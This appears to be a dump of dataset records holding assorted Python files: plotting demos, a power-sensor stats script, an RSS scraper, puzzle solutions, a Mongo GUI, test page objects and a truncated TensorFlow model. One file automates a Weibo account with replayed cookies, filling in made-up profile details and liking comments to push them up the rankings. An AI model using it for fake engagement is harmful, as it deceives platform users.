csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\nMain()","sub_path":"src/crawler/main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65473781","text":"#Author: Alan Izar\r\n#Trying to understand matplotlib and seaborn\r\n\r\nimport numpy as np\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nnp.random.seed(sum(map(ord,\"aesthetics\")))\r\n\r\ndef sinplot(flip=1):\r\n x = np.linspace(0,14,100)\r\n for i in range(1, 7):\r\n plt.plot(x, np.sin(x + i * 0.5) * (7 - i) * flip)\r\n plt.show()\r\n\r\nsns.set_style(\"white\")\r\n\r\nsinplot()\r\n\r\nwith sns.axes_style(\"darkgrid\"):\r\n plt.subplot(211)\r\n sinplot()\r\nplt.subplot(212)\r\nsinplot(-1)","sub_path":"learningseaborn.py","file_name":"learningseaborn.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"258016432","text":"#!/usr/bin/python\n\n# Read a file that contains logging data from electrical power load current sensors.\n# Compute statistics and send to graphing server.\n\n# Usage: statsApp [-f] inFile\n# Arguments:\n# inFile log file or directory to read\n# If a file is specified, the program processes the data in that file and\n# terminates, unless the -f option is specified, in which case it waits for\n# further data to be written to the input file.\n# If a directory is specified, all files in the directory are processed.\n# If a directory is specified and the -f option is specified, only the file\n# in the directory with the newest modified date is processed and the program\n# waits for further data in that file. If a new file is subsequently created in\n# the directory, the current file is closed and the new file is opened.\n# Options:\n# -f follow as the input file grows (as in tail -f)\n\n# configuration\ninFileName = \"\"\nfileDate = \"\"\nfollow = False\nreadInterval = .1\n\n# file handles\ninFile = None\n\n# graphite\ngraphiteSocket = None\nmetricsPrefix = \"\"\nmetricsHost = \"\"\nport = 2003\n\nimport os\nimport socket\nimport struct\nimport sys\nimport time\nimport getopt\nimport syslog\nimport datetime\nimport json\nfrom ha import *\n\nlastTime = 0\nlastTimeLog = 0\nstateDict = {\n \"loads.ac.power\": 0.0,\n \"loads.appliance1.power\": 0.0,\n \"loads.appliance2.power\": 0.0,\n \"loads.backhouse.power\": 0.0,\n \"loads.carcharger.power\": 0.0,\n \"loads.cooking.power\": 0.0,\n \"loads.lights.power\": 0.0,\n \"loads.plugs.power\": 0.0,\n \"loads.pool.power\": 0.0,\n \"loads.ac.power\": 0.0,\n \"loads.appliance1.dailyEnergy\": 0.0,\n \"loads.appliance2.dailyEnergy\": 0.0,\n \"loads.backhouse.dailyEnergy\": 0.0,\n \"loads.carcharger.dailyEnergy\": 0.0,\n \"loads.cooking.dailyEnergy\": 0.0,\n \"loads.lights.dailyEnergy\": 0.0,\n \"loads.plugs.dailyEnergy\": 0.0,\n \"loads.pool.dailyEnergy\": 0.0,\n \"loads.stats.power\": 0.0,\n \"loads.stats.dailyEnergy\": 0.0,\n}\n\n# get command line options and arguments\ndef getOpts():\n global follow\n global inDir, inFileName, inFiles\n (opts, args) = getopt.getopt(sys.argv[1:], \"f\")\n try:\n inFileName = args[0]\n if os.path.isdir(inFileName): # a directory was specified\n inDir = inFileName.rstrip(\"/\")+\"/\"\n inFiles = os.listdir(inDir)\n else: # a file was specified\n inDir = \"\"\n inFiles = [inFileName]\n except:\n terminate(1, \"input file must be specified\")\n for opt in opts:\n if opt[0] == \"-f\":\n follow = True\n debug(\"debugStats\", \"inFileName:\", inFileName)\n debug(\"debugStats\", \"follow:\", follow)\n\n# open the specified input file\ndef openInFile(inFileName):\n global inFile, fileDate\n if inFileName == \"stdin\":\n inFile = sys.stdin\n else:\n try:\n debug(\"debugStats\", inFileName)\n inFile = open(inFileName)\n fileDate = inFileName.split(\".\")[0].split(\"-\")[-1]\n fileDate = fileDate[0:4]+\"-\"+fileDate[4:6]+\"-\"+fileDate[6:8]\n except:\n terminate(1, \"Unable to open \"+inFileName)\n\n# close the currently open input file\ndef closeInFile(inFile):\n if inFile:\n debug(\"debugStats\", \"closing\", inFileName)\n inFile.close()\n\n# open the last modified file in the in directory\ndef openLastinFile():\n global inFileName, inDir, inFile\n if inDir != \"\": # directory was specified\n try:\n inFiles = os.listdir(inDir)\n except:\n terminate(1, \"Unable to access directory \"+inDir)\n latestModTime = 0\n # find the name of the file with the largest modified time\n for fileName in inFiles:\n inModTime = os.path.getmtime(inDir+fileName)\n if inModTime > latestModTime:\n latestModTime = inModTime\n latestFileName = inDir+fileName\n if inFileName != latestFileName: # is there a new file?\n closeInFile(inFile)\n inFileName = latestFileName\n openInFile(inFileName)\n zeroDaily()\n else: # just open the specified file the first time this is called\n if not inFile:\n openInFile(inFileName)\n\n# close all files\ndef closeFiles():\n if inFile: inFile.close()\n\ndef terminate(code, msg=\"\"):\n log(\"terminating\", msg)\n sys.exit(code)\n\n# zero the daily totals\ndef zeroDaily():\n global stateDict\n for item in list(stateDict.keys()):\n itemParts = item.split(\".\")\n if itemParts[2] == \"dailyEnergy\":\n stateDict[item] = 0.0\n\n# parse input power readings\ndef parseInput(inRec):\n global lastTime, lastTimeLog, stateDict\n try:\n [timeStamp, inDict] = json.loads(inRec)\n timeStamp = int(timeStamp)\n # if timeStamp < 1561332200: return\n # periodically log the time that is being processed\n if timeStamp > lastTimeLog+3600:\n log(\"processing\", time.asctime(time.localtime(timeStamp)))\n lastTimeLog = timeStamp\n if lastTime == 0:\n lastTime = timeStamp\n timeDiff = timeStamp - lastTime\n debug(\"debugStats\", \"input:\", timeStamp, inDict)\n # compute energy consumed since last measurement\n stateDict[\"loads.stats.power\"] = 0.0\n for item in list(stateDict.keys()):\n itemParts = item.split(\".\")\n if itemParts[0] == \"loads\":\n if itemParts[1] != \"stats\":\n if itemParts[2] == \"power\":\n # add to the total power for this period\n stateDict[\"loads.stats.power\"] += stateDict[item]\n # calculate energy consumed since last measurement for this sensor\n energy = stateDict[item] * timeDiff / 3600\n try:\n stateDict[\"loads.\"+itemParts[1]+\".dailyEnergy\"] += energy\n stateDict[\"loads.stats.dailyEnergy\"] += energy\n except KeyError:\n stateDict[\"loads.\"+itemParts[1]+\".dailyEnergy\"] = 0.0\n debug(\"debugStats\", \"energy:\", item, stateDict[item], energy, stateDict[\"loads.\"+itemParts[1]+\".dailyEnergy\"])\n # update the measurements\n for item in list(inDict.keys()):\n itemParts = item.split(\".\")\n if itemParts[0] == \"loads\":\n if itemParts[1] != \"stats\":\n if inDict[item] == None:\n inDict[item] = 0.0\n stateDict[item] = inDict[item]\n debug(\"debugStats\", \"power: \", item, inDict[item])\n debug(\"debugStats\", \"state:\", stateDict)\n lastTime = timeStamp\n except Exception as ex:\n log(\"exception\", str(ex), inRec[0:40])\n\ndef writeGraphite(timeStamp):\n try:\n metricsSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n metricsSocket.connect((metricsHost, port))\n for item in list(stateDict.keys()):\n metric = \"%s.%s %s %d\" % (metricsPrefix, item, str(stateDict[item]), timeStamp)\n debug(\"debugStats\", \"metric:\", metric)\n metricsSocket.send(bytes(metric+\"\\n\", \"utf-8\"))\n except socket.error as exception:\n log(\"sendMetrics\", \"socket error\", str(exception))\n if metricsSocket:\n metricsSocket.close()\n return\n\nif __name__ == \"__main__\":\n getOpts()\n graphiteSocket = True # openGraphite(hostName, port)\n # process the input file(s)\n if follow: # following - start\n # open the latest input file in the in directory\n openLastinFile()\n while True: # read forever\n inRec = inFile.readline()\n if inRec:\n # sometimes readline doesn't get everything\n # if the read didn't get the whole line, read more\n while inRec[-1] != \"\\n\":\n time.sleep(readInterval)\n debug(\"debugStats\", \"read again\")\n inRec += inFile.readline()\n parseInput(inRec)\n writeGraphite(lastTime)\n else: # end of file - see if a new file has been opened before trying again\n openLastinFile()\n time.sleep(readInterval)\n else: # not following - process whatever files were specified and exit\n for inFileName in inFiles:\n debug(\"debugStats\", \"reading:\", inDir+inFileName)\n openInFile(inDir+inFileName)\n inRec = inFile.readline()\n while inRec:\n parseInput(inRec)\n writeGraphite(lastTime)\n inRec = inFile.readline()\n closeInFile(inFile)\n closeFiles()\n terminate(0, \"Done\")\n","sub_path":"statsApp.py","file_name":"statsApp.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"604600037","text":"# -*- coding:utf-8 -*-\nimport pickle\nimport json\nimport requests\nimport re\n\nclass WeiboOpWithCoocie:\n def get_headers_edit(self, cookies):\n headers = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip,deflate,br\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8\",\n \"Connection\": \"keep-alive\",\n \"Host\": \"account.weibo.com\",\n \"Referer\": \"https://account.weibo.com/set/iframe?skin=skin048\",\n \"Upgrade-Insecure - Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36\",\n }\n\n cookie = \"\"\n for c in cookies:\n cookie = \"%s;%s=%s\" % (cookie, c[\"name\"], c[\"value\"])\n headers[\"Cookie\"] = cookie[1:] # 去掉首个分号\n print(json.dumps(cookies, indent=2))\n return headers\n\n def get_headers_post(self, cookies):\n headers = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip,deflate,br\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8\",\n \"Connection\": \"keep-alive\",\n \"Host\": \"weibo.com\",\n \"Referer\": \"https://weibo.com\",\n \"Upgrade-Insecure - Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36\",\n }\n\n cookie = \"\"\n for c in cookies:\n cookie = \"%s;%s=%s\" % (cookie, c[\"name\"], c[\"value\"])\n headers[\"Cookie\"] = cookie[1:] # 去掉首个分号\n return headers\n\n # 修改基本信息,没搞定,未知参数rid\n def edit_info(self, cookies):\n headers = self.get_headers_edit(cookies)\n payload = {\n 'setting_rid': 'd1Vlf235Q-LBj/DshHM8stx-1GQ=',\n 'nickname': '睡小迪_爱琪琪阿四',\n 'realname': '薛梦雪',\n 'gender': 'f',\n 'sextrend[]': '0',\n 'blog': '',\n 'mydesc': '一心一意',\n 'province': '11',\n 'city': '1',\n 'love': '',\n 'Date_Year': '1998',\n 'birthday_m': '03',\n 'birthday_d': '06',\n 'blood': '',\n 'pub_name': '0',\n 'pub_sextrend': '0',\n 'pub_love': '1',\n 'pub_birthday': '3',\n 'pub_blood': '1',\n 'pub_blog': '2',\n }\n res = requests.post(\"https://account.weibo.com/set/aj/iframe/editinfo\", headers=headers, data=payload).text\n if res['code'] == '100000':\n print(\"edit_info success!\")\n return True\n else:\n print(\"edit_info fail... \" + res['msg'])\n return False\n\n # 修改教育信息\n def edit_edu(self, cookies):\n headers = self.get_headers_edit(cookies)\n payload = {'name': '北京外国语大学',\n 'school_type': '1',\n 'start': '1995',\n 'privacy': '2',\n 'school_province': '11',\n 'school_id': '243973',\n }\n\n res = requests.post(\"https://account.weibo.com/set/aj/iframe/edupost\", headers=headers, data=payload).text\n if res['code'] == '100000':\n print(\"edit_edu success!\")\n return True\n else:\n print(\"edit_edu fail... \" + res['msg'])\n return False\n\n # 发文字微博\n def post(self, text, cookies):\n headers = self.get_headers_post(cookies)\n\n payload = {\n 'text': text,\n 'appkey': '', \n 'style_type': '1', \n 'pic_id': '', \n 'tid': '', \n 'pdetail': '', \n 'rank': '0', \n 'rankid': '', \n 'module': 'stissue', \n 'pub_source': 'main_', \n 'pub_type': 'dialog', \n 'isPri': '0', \n '_t': '0', \n }\n res = requests.post(\"https://weibo.com/aj/mblog/add\", headers=headers, data=payload).text\n res = json.loads(res)\n if res['code'] == '100000':\n print(\"post blog success!\")\n return True\n else:\n print(\"post blog fail... \" + res['msg'])\n return False\n \n # 给微博点赞\n def like_blog(self, blog_mid, cookies):\n headers = self.get_headers_post(cookies)\n payload = {\n 'version': ' mini',\n 'qid': ' heart', \n 'mid': blog_mid,\n 'loc': ' profile', \n 'cuslike': ' 1', \n '_t': ' 0', \n }\n res = requests.post(\"https://weibo.com/aj/v6/like/add\", headers=headers, data=payload).text\n res = json.loads(res)\n if res['code'] == '100000':\n print(\"like_blog success!\")\n return True\n else:\n print(\"like_blog fail... \" + res['msg'])\n return False\n\n #\n def like_object(self, ob_id, ob_type, cookies):\n headers = self.get_headers_post(cookies)\n payload = {\n 'object_id': ob_id,\n 'object_type': ob_type,\n '_t': '0',\n }\n res = requests.post(\"https://weibo.com/aj/v6/like/objectlike\", headers=headers, data=payload).text\n res = json.loads(res)\n if res['code'] == '100000':\n print(\"like_object(%s) success!\" % (ob_type))\n return True\n else:\n print(\"like_object(%s) fail... \" % (ob_type) + res['msg'])\n return False\n\n # 给评论点赞(捞人,抢热门\n def like_comment(self, comment_id, cookies):\n self.like_object(comment_id, \"comment\", cookies)\n\n # 评论和转发\n def comment_forward(self, blog_mid, uid, content, forward, cookies):\n headers = self.get_headers_post(cookies)\n payload = {\n 'act': 'post', \n 'mid': blog_mid,\n 'uid': uid,\n 'forward': forward,\n 'isroot': '0', \n 'content': content,\n 'module': 'scommlist',\n 'group_source': '', \n '_t': '0',\n }\n res = requests.post(\"https://weibo.com/aj/v6/comment/add\", headers=headers, data=payload).text\n res = json.loads(res)\n if res['code'] == '100000':\n print(\"comment_forward success!\")\n return True\n else:\n print(\"comment_forward fail... \" + res['msg'])\n return False\n\n # 删除微博\n def del_blog(self, blog_mid, cookies):\n headers = self.get_headers_post(cookies)\n payload = {\n 'mid': blog_mid,\n }\n res = requests.post(\"https://weibo.com/aj/mblog/del\", headers=headers, data=payload).text\n res = json.loads(res)\n if res['code'] == '100000':\n print(\"del_blog success!\")\n return True\n else:\n print(\"del_blog fail... \" + res['msg'])\n return False\n\n # 删除微博的评论\n def del_comment(self, blog_mid, comment_id, uid, cookies):\n headers = self.get_headers_post(cookies)\n payload = {\n 'act': 'delete', \n 'mid': blog_mid,\n 'cid': comment_id,\n 'uid': uid,\n 'is_block': '0', \n 'rid': comment_id,\n 'oid': '', \n '_t': '0', \n }\n res = requests.post(\"https://weibo.com/aj/comment/del\", headers=headers, data=payload).text\n res = json.loads(res)\n if res['code'] == '100000':\n print(\"del_comment success!\")\n return True\n else:\n print(\"del_comment fail... \" + res['msg'])\n return False\n\n # 关注和取关\n def follow_unfo(self, object_uid, follow, cookies):\n headers = self.get_headers_post(cookies)\n payload = {\n 'uid': object_uid,\n 'refer_flag': '1005050002',\n 'oid': object_uid,\n 'wforce': '1', \n 'nogroup': 'false', \n 'refer_from': 'profile_headerv6',\n '_t': '0', \n }\n if follow == \"1\":\n follow = \"followed\"\n elif follow == \"0\":\n follow = \"unfollow\"\n\n res = requests.post(\"https://weibo.com/aj/f/%s\" % (follow), headers=headers, data=payload).text\n res = json.loads(res)\n if res['code'] == '100000':\n print(\"follow_unfo success!\")\n return True\n else:\n print(\"follow_unfo fail... \" + res['msg'])\n return False\n\n def home(self, uid, cookies):\n headers = self.get_headers_post(cookies)\n print(requests.get(\"https://weibo.com/u/%s/home\" % (uid), headers=headers).text)\n\n def get_uid(self, cookies):\n uid = \"\"\n for c in cookies:\n match_ob = re.match(\"wb_cusLike_([0-9]*)\", c['name'])\n if match_ob is not None:\n uid = match_ob.group(1)\n if uid != \"\":\n print(uid)\n else:\n print(u\"出错了,没有从cookies中获取到uid...\")\n return uid\n\nif __name__ == \"__main__\":\n cookies = pickle.load(open(\"./co_182\", \"rb\"))\n wbop = WeiboOpWithCoocie()\n # wbop.del_comment(\"4196497862202988\", \"4196499850359603\", wbop.get_uid(cookies), cookies)\n wbop.follow_unfo(\"6219737121\", \"1\", cookies)\n # wbop.comment_forward(\"4196060278136857\", wbop.get_uid(cookies), u\"好暖呢\", \"1\", cookies)\n # headers = wbop.like_comment(\"4196488429169417\", co)","sub_path":"weibo/weibo_op_cookie.py","file_name":"weibo_op_cookie.py","file_ext":"py","file_size_in_byte":9575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"417648876","text":"# -*- coding: utf-8 -*-\n\"\"\"\nフィードからエントリを収集する\n\"\"\"\nimport html\nimport feedparser\nfrom bs4 import BeautifulSoup\n\nimport dbmanager\n\n\nclass RssScraper:\n def __init__(self):\n \"\"\"\n 初期化処理\n\n DBと接続する\n \"\"\"\n self.dbManager = dbmanager.DbManager()\n\n def save_entries(self):\n \"\"\"\n エントリを収集する\n\n Returns\n -------\n count : int\n 収集したエントリ数\n \"\"\"\n feeds = self.dbManager.get_feed_list()\n count = 0\n\n for feed in feeds:\n feedId = feed['id']\n userId = feed['user_id']\n feedUrl = feed['feedUrl']\n\n recentUpdated = self.dbManager.search_recent_updated(feedId, userId)\n\n feed = feedparser.parse(feedUrl)\n for entry in feed.entries:\n update = dbmanager.parse_date(entry.updated)\n\n if update <= recentUpdated:\n continue\n\n soup = BeautifulSoup(entry.summary, \"html.parser\")\n text = html.escape(soup.get_text())\n\n query = 'INSERT INTO entries '\\\n '(feed_id, user_id, entry_title, entry_url, summary, updated) '\\\n 'VALUES (%s, %s, %s, %s, %s, %s)'\n\n self.dbManager.execute_query(\n query,\n feedId,\n userId,\n entry.title,\n entry.link,\n text[:200] + \"...\",\n update\n )\n count = count + 1\n\n return count\n\n\nif __name__ == '__main__':\n RssScraper('production').save_entries()\n","sub_path":"web/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"588474389","text":"#!/usr/bin/env python3\n\ndef process(outlets, devices, l, flip):\n if l == len(devices[0]):\n outlets_s = [x.decode('utf-8') for x in outlets]\n devices_s = [x.decode('utf-8') for x in devices]\n outlets_s.sort()\n if outlets_s == devices_s:\n return flip\n else:\n return None\n if l != 0:\n outlets_s = [x[:l].decode('utf-8') for x in outlets]\n devices_s = [x[:l].decode('utf-8') for x in devices]\n outlets_s.sort()\n if outlets_s != devices_s:\n return None\n required_zeros = [x[l] for x in devices].count(48)\n has_zeros = [x[l] for x in outlets].count(48)\n retval1 = retval2 = 999\n if required_zeros == has_zeros:\n retval1 = process(outlets, devices, l+1, flip)\n if retval1 is None:\n retval1 = 999\n if required_zeros + has_zeros == len(devices):\n for o in outlets:\n if o[l] == 49:\n o[l] = 48\n else:\n o[l] = 49\n retval2 = process(outlets, devices, l+1, flip+1)\n if retval2 is None:\n retval2 = 999\n for o in outlets:\n if o[l] == 49:\n o[l] = 48\n else:\n o[l] = 49\n if retval1 == retval2 and retval2 == 999:\n return None\n else:\n return min(retval1, retval2)\n\nT = int(input())\nfor case in range(1, T+1):\n input()\n outlets = [bytearray(s, 'utf-8') for s in input().split()]\n devices = [bytearray(s, 'utf-8') for s in input().split()]\n devices.sort()\n retval = process(outlets, devices, 0, 0)\n print('Case #{0}: {1}'.format(case, retval if retval is not None else 'NOT POSSIBLE'))\n","sub_path":"solutions_5634947029139456_1/Python/pinkplus/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"184073727","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n'''\n • Complexity\n ○ O(nlogk) - n being length, k being # of lists\n • Topics\n ○ linkedlist\n执行logk次merge2。注意最后merge顺序的书写方法 - 其实可以crappy一点,每次用新的list\n'''\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n def merge2(l1: ListNode, l2: ListNode):\n if not l1: return l2\n if not l2: return l1\n\n dummy = ListNode(None)\n curr = dummy\n while l1 and l2:\n if l1.val < l2.val:\n curr.next = l1\n l1 = l1.next\n else:\n curr.next = l2\n l2 = l2.next\n curr = curr.next\n curr.next = l1 if l1 else l2 \n return dummy.next\n \n # Edge case handling\n if not lists: return None\n\n # in-place\n length = len(lists)\n # Current interval\n interval = 1\n while interval < length:\n # Amount - interval makes sure last pair has a distance of interval in between\n for i in range(0, length - interval, interval * 2):\n lists[i] = merge2(lists[i], lists[i + interval])\n interval *= 2\n return lists[0]\n '''\n # Crappy merge (not in place)\n curr = lists\n while len(curr) > 1:\n li = []\n # Actually similar to in-place solution\n for i in range(0, len(curr) - 1, 2):\n li.append(merge2(curr[i], curr[i + 1]))\n # Append the last one if odd\n if len(curr) % 2 == 1:\n li.append(curr[-1])\n curr = li\n return curr[0]\n '''","sub_path":"leetcode/23_merge_k_sorted_lists.py","file_name":"23_merge_k_sorted_lists.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"449710520","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom tkinter.ttk import Combobox\nfrom Mongo import Mongo\n\n\nclass FieldWindow(Frame):\n def __init__(self, parent, controller):\n Frame.__init__(self, parent)\n self.controller = controller\n self.bind(\"<>\", self.onShowFrame)\n mongo = Mongo()\n\n def selectedDocument(event):\n Mongo.setDocument(mongo, self.comboboxDocument.current())\n fields = Mongo.getFields(mongo)\n self.comboboxField.config(values=fields)\n self.comboboxField.current(0)\n\n def nextFrame(field):\n Mongo.setField(mongo, field)\n dataType = Mongo.getFieldDataType(mongo)\n if dataType == 'string':\n self.controller.showFrame(\"StringLengthWindow\")\n elif dataType == 'int' or dataType == 'double' or dataType == 'long' or dataType == 'decimal':\n self.controller.showFrame(\"NumberIntervalWindow\")\n else:\n messagebox.showerror(\"Error\", \"Selected field must be a number or string data type\")\n\n labelDocument = Label(self, text=\"Select document:\")\n labelDocument.grid(row=0, column=0, padx=5, pady=5, sticky=\"W\")\n\n self.comboboxDocument = Combobox(self, state=\"readonly\")\n self.comboboxDocument.bind(\"<>\", selectedDocument)\n self.comboboxDocument.grid(row=0, column=1, padx=5, pady=5)\n\n labelField = Label(self, text=\"Select field:\")\n labelField.grid(row=1, column=0, padx=5, pady=5, sticky=\"W\")\n\n self.comboboxField = Combobox(self, state=\"readonly\")\n self.comboboxField.grid(row=1, column=1, padx=5, pady=5)\n\n buttonBack = Button(self, text=\"Back\", command=lambda: controller.showFrame(\"StartWindow\"))\n buttonBack.grid(row=2, column=0, padx=5, pady=5, sticky=\"W\")\n\n buttonConfirm = Button(self, text=\"Confirm\", command=lambda: nextFrame(self.comboboxField.get()))\n buttonConfirm.grid(row=2, column=1, padx=5, pady=5, sticky=\"E\")\n\n def onShowFrame(self, event):\n try:\n mongo = Mongo()\n\n documentsID = Mongo.getDocumentsID(mongo)\n self.comboboxDocument.config(values=documentsID)\n self.comboboxDocument.current(0)\n Mongo.setDocument(mongo, self.comboboxDocument.current())\n\n fields = Mongo.getFields(mongo)\n self.comboboxField.config(values=fields)\n self.comboboxField.current(0)\n Mongo.setField(mongo, self.comboboxField.get())\n\n except IndexError:\n messagebox.showerror(\"Error\", \"Collection has no data\")\n self.controller.showFrame(\"StartWindow\")\n\n except:\n messagebox.showerror(\"Error\", \"Unexpected error\")\n","sub_path":"FieldWindow.py","file_name":"FieldWindow.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"75080449","text":"from .base_page import BasePage\nfrom .locators import ProductPageLocators\n\n\nclass ProductPage(BasePage):\n def add_product_to_basket(self):\n button = self.browser.find_element(*ProductPageLocators.ADD_TO_BASKET_BUTTON)\n button.click()\n self.solve_quiz_and_get_code()\n name_good = self.browser.find_element(*ProductPageLocators.NAME_GOOD).text\n price_good = self.browser.find_element(*ProductPageLocators.PRICE_GOOD).text\n name_good_in_basket = self.browser.find_element(*ProductPageLocators.NAME_GOOD_BASKET).text\n price_good_in_basket = self.browser.find_element(*ProductPageLocators.PRICE_GOOD_BASKET).text\n assert name_good == name_good_in_basket, \"This product isn't in basket\"\n assert price_good == price_good_in_basket, \"The basket amount is not equal price of product\"\n\n def should_not_be_success_message(self):\n assert self.is_not_element_present(*ProductPageLocators.SUCCESS_MESSAGE), \"Success message is presented,\" \\\n \" but should not be\"\n\n def should_disappeared_success_message(self):\n assert self.is_disappeared(*ProductPageLocators.SUCCESS_MESSAGE), \"Success message is not disappeared\"\n","sub_path":"pages/product_page.py","file_name":"product_page.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"505192781","text":"from __future__ import print_function\nimport os, time, cPickle\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom random import shuffle\nfrom scipy.spatial.distance import *\nimport sklearn.preprocessing\nfrom base_model import BaseModel, BaseModelParams, BaseDataIter\nimport utils\nfrom flip_gradient import flip_gradient\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nclass DataIter(BaseDataIter):\n def __init__(self, batch_size):\n BaseDataIter.__init__(self, batch_size)\n self.num_train_batch = 0\n self.num_test_batch = 0\n\n with open('./data/pascal/data/train_img_feats.pkl', 'rb') as f:\n self.train_img_feats = cPickle.load(f)\n with open('./data/pascal/data/train_txt_vecs.pkl', 'rb') as f:\n self.train_txt_vecs = cPickle.load(f)\n with open('./data/pascal/data/train_labels.pkl', 'rb') as f:\n self.train_labels = cPickle.load(f)\n with open('./data/pascal/data/test_img_feats.pkl', 'rb') as f:\n self.test_img_feats = cPickle.load(f)\n with open('./data/pascal/data/test_txt_vecs.pkl', 'rb') as f:\n self.test_txt_vecs = cPickle.load(f)\n with open('./data/pascal/data/test_labels.pkl', 'rb') as f:\n self.test_labels = cPickle.load(f)\n\n print(len(self.train_img_feats))\n print(len(self.test_img_feats))\n \n \n self.num_train_batch = len(self.train_img_feats) / self.batch_size\n self.num_test_batch = len(self.test_img_feats) / self.batch_size\n\n def train_data(self):\n for i in range(self.num_train_batch):\n batch_img_feats = self.train_img_feats[i*self.batch_size : (i+1)*self.batch_size]\n batch_txt_vecs = self.train_txt_vecs[i*self.batch_size : (i+1)*self.batch_size]\n batch_labels = self.train_labels[i*self.batch_size : (i+1)*self.batch_size]\n yield batch_img_feats, batch_txt_vecs, batch_labels, i\n\n def test_data(self):\n for i in range(self.num_test_batch):\n batch_img_feats = self.test_img_feats[i*self.batch_size : (i+1)*self.batch_size]\n batch_txt_vecs = self.test_txt_vecs[i*self.batch_size : (i+1)*self.batch_size]\n batch_labels = self.test_labels[i*self.batch_size : (i+1)*self.batch_size]\n yield batch_img_feats, batch_txt_vecs, batch_labels, i\n\n\nclass ModelParams(BaseModelParams):\n def __init__(self):\n BaseModelParams.__init__(self)\n self.n_save_epoch = 10\n self.n_max_save = 10\n self.r_domain = 1.0\n self.r_pair = 0.1\n self.n_class = 20\n\n self.epoch = 100\n self.margin = .1\n self.alpha = 5\n self.batch_size = 40\n self.visual_feat_dim = 4096\n #self.word_vec_dim = 300\n self.word_vec_dim = 1000\n self.lr_total = 0.0001\n self.lr_emb = 0.0001\n self.lr_domain = 0.0001\n self.lr_pair = 0.0001\n self.top_k = 50\n self.semantic_emb_dim = 200\n self.dataset_name = 'wikipedia_dataset'\n self.model_name = 'adv_semantic_zsl'\n self.model_dir = 'adv_semantic_zsl_conditional_pascal_%d_%d_%d' % (self.visual_feat_dim, self.word_vec_dim, self.semantic_emb_dim)\n\n self.checkpoint_dir = 'checkpoint'\n self.sample_dir = 'samples'\n self.dataset_dir = './data'\n self.log_dir = 'logs'\n \n def update(self):\n self.checkpoint_dir = os.path.join(self.checkpoint_dir, self.model_dir)\n self.sample_dir = os.path.join(self.sample_dir, self.model_dir)\n self.log_dir = os.path.join(self.log_dir, self.model_dir)\n self.dataset_dir = os.path.join(self.dataset_dir, self.dataset_name)\n\n\nclass AdvCrossModalSimple(BaseModel):\n def __init__(self, model_params):\n BaseModel.__init__(self, model_params)\n self.data_iter = DataIter(self.model_params.batch_size)\n\n self.tar_img = tf.placeholder(tf.float32, [None, self.model_params.visual_feat_dim])\n self.tar_txt = tf.placeholder(tf.float32, [None, self.model_params.word_vec_dim])\n self.pos_img = tf.placeholder(tf.float32, [None, self.model_params.visual_feat_dim])\n self.neg_img = tf.placeholder(tf.float32, [None, self.model_params.visual_feat_dim])\n self.unpair_txt = tf.placeholder(tf.float32, [None, self.model_params.word_vec_dim])\n self.unpair_img = tf.placeholder(tf.float32, [None, self.model_params.visual_feat_dim])\n self.pos_txt = tf.placeholder(tf.float32, [None, self.model_params.word_vec_dim])\n self.neg_txt = tf.placeholder(tf.float32, [None, self.model_params.word_vec_dim])\n self.y = tf.placeholder(tf.int32, [self.model_params.batch_size,self.model_params.n_class])\n self.y_single = tf.placeholder(tf.int32, [self.model_params.batch_size,1])\n self.l = tf.placeholder(tf.float32, [])\n self.emb_v = self.visual_feature_embed(self.tar_img)\n self.emb_w = self.label_embed(self.tar_txt)\n self.emb_v_pos = self.visual_feature_embed(self.pos_img,reuse=True)\n self.emb_v_neg = self.visual_feature_embed(self.neg_img,reuse=True)\n self.emb_w_pos = self.label_embed(self.pos_txt,reuse=True)\n self.emb_w_neg = self.label_embed(self.neg_txt,reuse=True)\n self.emb_v_unpair = self.visual_feature_embed(self.unpair_img, reuse=True)\n self.emb_w_unpair = self.label_embed(self.unpair_txt, reuse=True)\n\n 